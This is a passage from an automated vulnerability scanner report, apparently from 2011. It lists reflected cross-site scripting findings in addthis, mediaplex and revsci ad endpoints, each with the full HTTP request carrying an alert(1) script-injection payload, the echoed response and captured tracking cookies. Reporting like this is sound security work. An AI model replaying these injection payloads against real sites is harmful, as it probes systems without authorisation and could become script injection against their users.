<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/dealbook/category/main-topicsdbe83\"><script>alert(1)</script>aec22f4a558/venture-capital&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Lef
...[SNIP]...

4.102. http://ds.addthis.com/red/psi/sites/www.csscorp.com/p.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.csscorp.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f3a5c<script>alert(1)</script>fa005dc8a42 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.csscorp.com/p.json?callback=_ate.ad.hprf3a5c<script>alert(1)</script>fa005dc8a42&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.csscorp.com%2F&ffv352 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305200976.1FE|1305201657.1OD|1305200976.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 12:10:14 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 12:10:14 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 12:10:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 12:10:14 GMT
Connection: close

_ate.ad.hprf3a5c<script>alert(1)</script>fa005dc8a42({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

4.103. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.elawmarketing.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload dd5d7<script>alert(1)</script>da1a969282b was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.elawmarketing.com/p.json?callback=_ate.ad.hprdd5d7<script>alert(1)</script>da1a969282b&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.elawmarketing.com%2Fabout%2Fclients&ref=http%3A%2F%2Fwww.elawmarketing.com%2F&149tj8h HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305200976.1FE|1305200976.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 227
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 12:00:58 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 12:00:58 GMT; Path=/
Set-Cookie: di=%7B%7D..1305200976.1FE|1305201658.1OD|1305200976.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 12:00:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 12:00:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 12:00:58 GMT
Connection: close

_ate.ad.hprdd5d7<script>alert(1)</script>da1a969282b({"urls":["http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3"],"segments" : ["1OD"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

4.104. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.pomerantzlaw.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7f299<script>alert(1)</script>34209919e93 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.pomerantzlaw.com/p.json?callback=_ate.ad.hpr7f299<script>alert(1)</script>34209919e93&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.pomerantzlaw.com%2Fattorneys.html&ref=http%3A%2F%2Fwww.pomerantzlaw.com%2Fcontact-us.html&1mrdgam HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.60|1304431085.1OD|1304431085.1FE; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 457
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 11:49:37 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 11:49:37 GMT; Path=/
Set-Cookie: di=%7B%7D..1305200977.1FE|1305200977.1OD|1305200977.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 11:49:36 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 11:49:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 11:49:37 GMT
Connection: close

_ate.ad.hpr7f299<script>alert(1)</script>34209919e93({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3","http://cspix.media6degrees.com/orbser
...[SNIP]...

4.105. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3f80'%3balert(1)//cf614ca88fe was submitted in the mpck parameter. This input was echoed as f3f80';alert(1)//cf614ca88fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592f3f80'%3balert(1)//cf614ca88fe&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:01 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6890
Content-Type: application/x-javascript

(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
u=10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;!c=;~aopt=2/1/9e/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/15917-119013-26745-9?mpt=4107592f3f80';alert(1)//cf614ca88fe" target="_blank">
...[SNIP]...

4.106. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 174b2"-alert(1)-"3864f9a6960 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592174b2"-alert(1)-"3864f9a6960&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:59 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6884
Content-Type: application/x-javascript

(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592174b2"-alert(1)-"3864f9a6960");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592174b2"-alert(1)-"3864f9a6960");
mpck = "h
...[SNIP]...

4.107. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpjs parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The value of the mpjs request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5874a"%3balert(1)//f4e52b4d717 was submitted in the mpjs parameter. This input was echoed as 5874a";alert(1)//f4e52b4d717 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D71643475874a"%3balert(1)//f4e52b4d717&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:07 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6800
Content-Type: application/x-javascript

(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
<script type=\"text/javascript\" src=\"http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=175237&siteID=15917119013267459&creativeID=71643475874a";alert(1)//f4e52b4d717\">
...[SNIP]...

4.108. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54bb8'%3balert(1)//3d79a42824 was submitted in the mpvc parameter. This input was echoed as 54bb8';alert(1)//3d79a42824 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f54bb8'%3balert(1)//3d79a42824 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:19 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6882
Content-Type: application/x-javascript

(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
3995;qc=921;qc=922;qc=928;qc=929;qc=3994;sz=300x250,336x280;tile=2;u=10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;!c=;~aopt=2/1/9e/0;~sscs=?54bb8';alert(1)//3d79a42824http://altfarm.mediaplex.com/ad/ck/15917-119013-26745-9?mpt=4107592" target="_blank">
...[SNIP]...

4.109. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fe36"%3balert(1)//f0cdb562aed was submitted in the mpvc parameter. This input was echoed as 3fe36";alert(1)//f0cdb562aed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f3fe36"%3balert(1)//f0cdb562aed HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:17 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6886
Content-Type: application/x-javascript

(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
3995;qc=921;qc=922;qc=928;qc=929;qc=3994;sz=300x250,336x280;tile=2;u=10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;!c=;~aopt=2/1/9e/0;~sscs=?3fe36";alert(1)//f0cdb562aed");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/x;240687484;0-0;0;22018236;4307-300/250;41199286/41217073/1;u=10428|||||art
...[SNIP]...

4.110. http://js.revsci.net/gateway/gw.js [csid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload b4693<script>alert(1)</script>358699d24a2 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=J07717b4693<script>alert(1)</script>358699d24a2 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; 